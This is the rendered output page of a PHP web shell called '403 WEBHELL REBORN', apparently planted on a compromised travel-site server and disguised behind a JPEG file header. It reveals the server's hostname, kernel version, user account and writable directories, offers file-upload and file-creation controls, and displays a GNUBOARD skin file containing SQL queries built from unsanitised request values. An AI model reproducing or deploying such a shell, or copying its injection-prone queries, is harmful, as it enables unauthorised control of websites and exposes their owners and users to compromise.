ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : tkt_travelbus ( 1137)
PHP Version : 7.0.0p1
Disable Function : mysql_pconnect
Directory :  /tkt_travelbus/www/skin/board/co_ucc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /tkt_travelbus/www/skin/board/co_ucc/write_update.skin.php
<?
if (!defined("_GNUBOARD_")) exit; // 개별 페이지 접근 불가 
// 자신만의 코드를 넣어주세요.
?>

<? // --  수정모드에서만 작동

if ($w == 'u' && $is_admin) { // 임의로 등록날짜 수정가능
        $sql = " update $write_table set wr_datetime = '$wr_datetime' 
                where wr_id = '$wr_id' "; 
        sql_query($sql); 
    } 

?> 
<? 

if ($w == 'u' && $is_admin) { // 임의로 조회수 증가시키기
        $sql = " update $write_table set wr_hit = '$wr_hit' 
                where wr_id = '$wr_id' "; 
        sql_query($sql); 
    } 

?> 



Anon7 - 2021